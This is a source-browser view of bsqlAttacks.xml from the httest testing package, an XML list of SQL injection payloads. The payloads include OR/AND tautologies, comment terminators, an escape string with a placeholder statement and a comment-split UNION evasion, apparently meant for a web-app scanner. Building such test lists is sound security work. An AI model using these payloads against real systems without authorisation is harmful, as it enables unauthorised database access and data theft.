File: bsqlAttacks.xml

package info (click to toggle)
httest 2.4.23-5
  • links: PTS, VCS
  • area: main
  • in suites: forky, sid, trixie
  • size: 4,876 kB
  • sloc: ansic: 19,553; sh: 10,550; xml: 1,047; makefile: 510; lisp: 145; perl: 31
file content (59 lines) | stat: -rw-r--r-- 1,444 bytes parent folder | download | duplicates (6) 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
 
<?xml version="1.0" encoding="UTF-8"?>
<!-- Some of theses SQL Injection are from ha.ckers.org web security lab -->
<sql>
	<attack>
		<name>TEST</name>
		<code>1'GRABBER_SQL_INJECTION</code>
		<label>Basic SQL Injection Attacks</label>
	</attack>
	<attack>
		<name>OR</name>
		<code>1' OR 1 OR 1='</code>
		<label>Logicial SQL Injection Attacks</label>
	</attack>
	<attack>
		<name>OR</name>
		<code>OR 1=1</code>
		<label>Logicial SQL Injection Attacks</label>
	</attack>
	<attack>
		<name>OR</name>
		<code>"OR "1"="1</code>
		<label>Logicial SQL Injection Attacks</label>
	</attack>
	<attack>
		<name>OR</name>
		<code>1' OR 1 OR 1='</code>
		<label>Logicial SQL Injection Attacks</label>
	</attack>
	<attack>
		<name>AND</name>
		<code>1' AND 1=1 OR 1='</code>
		<label>Logicial SQL Injection Attacks</label>
	</attack>
	<attack>
		<name>AND</name>
		<code>1 AND 1=1</code>
		<label>Logicial SQL Injection Attacks</label>
	</attack>
	<attack>
		<name>AND</name>
		<code>" AND "1"="1</code>
		<label>Logicial SQL Injection Attacks</label>
	</attack>
	<attack>
		<name>COMMENT</name>
		<code>';--</code>
		<label>Command SQL Injection Attacks</label>
	</attack>
	<attack>
		<name>ESCAPE</name>
		<code>\'; GRABBER_SQL_STATEMENT; --</code>
		<label>Escape SQL Injection Attacks</label>
	</attack>
	<attack>
		<name>EVASION</name>
		<code>1 UNI/**/ON SELECT ALL FROM WHERE</code>
		<label>Evasion SQL Injection Attacks</label>
	</attack>
</sql>